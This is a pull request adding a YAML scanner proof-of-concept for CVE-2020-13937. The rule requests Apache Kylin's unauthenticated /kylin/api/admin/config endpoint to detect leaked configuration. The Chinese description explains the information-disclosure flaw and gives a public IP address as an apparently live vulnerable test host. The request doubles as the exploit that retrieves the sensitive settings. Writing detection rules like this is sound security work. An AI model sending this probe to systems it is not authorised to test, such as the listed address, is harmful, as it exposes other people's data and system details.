### PR TITLE
Create apache-kylin-unauth-cve-2020-13937.yml

### DIFF
--- a/pocs/apache-kylin-unauth-cve-2020-13937.yml
+++ b/pocs/apache-kylin-unauth-cve-2020-13937.yml
@@ -3,7 +3,7 @@ rules:
   - method: GET
     path: /kylin/api/admin/config
     expression: |
-      response.status == 200 && response.body.bcontains(b"config") && response.body.bcontains(b"kylin.metadata.url")
+      response.status == 200 && response.headers["Content-Type"].contains("application/json") && response.body.bcontains(b"config") && response.body.bcontains(b"kylin.metadata.url")
 detail:
   author: JingLing(github.com/shmilylty)
   links:

--- a/pocs/apache-kylin-unauth-cve-2020-13937.yml
+++ b/pocs/apache-kylin-unauth-cve-2020-13937.yml
@@ -1,0 +1,10 @@
+name: poc-yaml-apache-kylin-unauth-cve-2020-13937
+rules:
+  - method: GET
+    path: /kylin/api/admin/config
+    expression: |
+      response.status == 200 && response.body.bcontains(b"config") && response.body.bcontains(b"kylin.metadata.url")
+detail:
+  author: JingLing(github.com/shmilylty)
+  links:
+    - https://s.tencent.com/research/bsafe/1156.html


### PR DESCRIPTION
## 本 poc 是检测什么漏洞的
Apache Kylin 有一个restful api会在没有认可认证的情况下暴露配置信息。
攻击者可利用该漏洞获取系统敏感信息。

## 测试环境
http://8.129.24.112:7001/
## 备注
